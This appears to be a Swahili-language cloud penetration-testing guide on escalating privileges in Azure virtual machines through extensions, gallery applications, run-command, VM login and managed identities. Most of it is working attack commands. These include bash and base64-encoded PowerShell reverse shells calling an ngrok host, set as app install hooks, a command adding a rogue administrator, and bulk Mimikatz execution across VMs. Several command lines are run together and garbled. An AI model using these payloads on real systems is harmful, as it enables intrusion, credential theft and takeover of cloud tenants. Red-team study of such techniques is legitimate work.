Ruhusa hii inaruhusu kutekeleza nyongeza katika mashine za virtual ambazo zinaruhusu kutekeleza msimbo wowote juu yao.
Mfano wa kutumia nyongeza za kawaida kutekeleza amri zisizo za kawaida katika VM:
Unaweza pia kutekeleza payloads nyingine kama: powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add
Rejesha nenosiri ukitumia nyongeza ya VMAccess
# Run VMAccess extension to reset the password$cred=Get-Credential# Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the passwordSet-AzVMAccessExtension-ResourceGroupName "<rsc-group>"-VMName "<vm-name>"-Name "myVMAccess"-Credential $cred
Pia inawezekana kutumia nyongeza zinazojulikana vizuri kutekeleza msimbo au kufanya vitendo vya kibali ndani ya VMs:
VMAccess extension
Nyongeza hii inaruhusu kubadilisha nenosiri (au kuunda ikiwa halipo) la watumiaji ndani ya VMs za Windows.
# Run VMAccess extension to reset the password$cred=Get-Credential# Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the passwordSet-AzVMAccessExtension-ResourceGroupName "<rsc-group>"-VMName "<vm-name>"-Name "myVMAccess"-Credential $cred
DesiredConfigurationState (DSC)
Hii ni nyongeza ya VM inayomilikiwa na Microsoft inayotumia PowerShell DSC kusimamia usanidi wa Azure Windows VMs. Hivyo, inaweza kutumika kutekeleza amri zisizo na mipaka katika Windows VMs kupitia nyongeza hii:
Hii ni nyongeza ya VM ambayo itaruhusu kutekeleza runbooks katika VMs kutoka kwa akaunti ya automatisering. Kwa maelezo zaidi angalia huduma ya Automation Accounts.
Hizi ni ruhusa zinazohitajika kuunda programu mpya ya galleri na kuitekeleza ndani ya VM. Programu za galleri zinaweza kutekeleza chochote hivyo mshambuliaji anaweza kutumia hii kuathiri mifano ya VM zinazotekeleza amri zisizo na mipaka.
Ruhusa za mwisho 2 zinaweza kuepukwa kwa kushiriki programu hiyo na mpangaji.
Mfano wa unyakuzi wa kutekeleza amri zisizo na mipaka:
# Create gallery (if the isn't any)azsigcreate--resource-groupmyResourceGroup \--gallery-name myGallery--location"West US 2"# Create application containerazsiggallery-applicationcreate \--application-name myReverseShellApp \--gallery-name myGallery \--resource-group <rsc-group> \--os-type Linux \--location "West US 2"# Create app version with the rev shell## In Package file link just add any link to a blobl storage fileazsiggallery-applicationversioncreate \--version-name 1.0.2 \--application-name myReverseShellApp \--gallery-name myGallery \--location "West US 2" \--resource-group <rsc-group> \--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \--install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \--remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \--update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'"# Install the app in a VM to execute the rev shell## Use the ID given in the previous outputazvmapplicationset \--resource-group <rsc-group> \--name <vm-name> \--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \--treat-deployment-as-failure true
# Create gallery (if the isn't any)azsigcreate--resource-group<rsc-group> \--gallery-name myGallery--location"West US 2"# Create application containerazsiggallery-applicationcreate \--application-name myReverseShellAppWin \--gallery-name myGallery \--resource-group <rsc-group> \--os-type Windows \--location "West US 2"# Get encoded reverse shellecho -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
# Create app version with the rev shell## In Package file link just add any link to a blobl storage fileexport encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
azsiggallery-applicationversioncreate \--version-name 1.0.0 \--application-name myReverseShellAppWin \--gallery-name myGallery \--location "West US 2" \--resource-group <rsc-group> \--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \--install-command "powershell.exe -EncodedCommand $encodedCommand" \--remove-command "powershell.exe -EncodedCommand $encodedCommand" \--update-command "powershell.exe -EncodedCommand $encodedCommand"# Install the app in a VM to execute the rev shell## Use the ID given in the previous outputazvmapplicationset \--resource-group <rsc-group> \--name deleteme-win4 \--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \--treat-deployment-as-failure true
# The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action# Execute a rev shellazvmrun-commandinvoke \--resource-group Research \--name juastavm \--command-id RunPowerShellScript \--scripts @revshell.ps1## Get encoded reverse shellecho -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
## Create app version with the rev shell## In Package file link just add any link to a blobl storage fileexport encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
# The content ofecho"powershell.exe -EncodedCommand $encodedCommand">revshell.ps1# Try to run in every machineImport-moduleMicroBurst.psm1Invoke-AzureRmVMBulkCMD-ScriptMimikatz.ps1-Verbose-outputOutput.txt
Microsoft.Compute/virtualMachines/login/action
Ruhusa hii inamruhusu mtumiaji kuingia kama mtumiaji kwenye VM kupitia SSH au RDP (mradi uthibitisho wa Entra ID umewezeshwa kwenye VM).
Ingia kupitia SSH na az ssh vm --name <vm-name> --resource-group <rsc-group> na kupitia RDP na vithibitisho vyako vya kawaida vya Azure.
Hizi zote ni ruhusa muhimu za kuunda VM yenye utambulisho maalum wa kusimamiwa na kuacha bandari wazi (22 katika kesi hii). Hii inamruhusu mtumiaji kuunda VM na kuungana nayo na kuchukua alama za utambulisho wa kusimamiwa ili kupandisha mamlaka kwake.
Kulingana na hali, ruhusa zaidi au chache zinaweza kuhitajika kutumia mbinu hii.
azvmcreate \--resource-group Resource_Group_1 \--name cli_vm \--image Ubuntu2204 \--admin-username azureuser \--generate-ssh-keys \--assign-identity /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourcegroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity \--nsg-rule ssh \--location "centralus"# By default pub key from ~/.ssh is used (if none, it's generated there)
Ruhusa hizo zinatosha kuteua utambulisho mpya wa usimamizi kwa VM. Kumbuka kwamba VM inaweza kuwa na utambulisho kadhaa wa usimamizi. Inaweza kuwa na ule wa mfumo, na utambulisho mwingi wa usimamizi wa mtumiaji.
Kisha, kutoka kwa huduma ya metadata inawezekana kuzalisha tokeni kwa kila mmoja.
# Get currently assigned managed identities to the VMazvmidentityshow \--resource-group <rsc-group> \--name <vm-name># Assign several managed identities to a VMazvmidentityassign \--resource-group <rsc-group> \--name <vm-name> \--identities \/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2
Kisha mshambuliaji anahitaji kuwa amevamia kwa namna fulani VM ili kuiba tokens kutoka kwa utambulisho wa usimamizi uliotolewa. Angalia maelezo zaidi katika:
Kulingana na docs, ruhusa hii inakuwezesha kusimamia OS ya rasilimali yako kupitia Windows Admin Center kama msimamizi. Hivyo inaonekana hii inatoa ufikiaji wa WAC kudhibiti VMs...
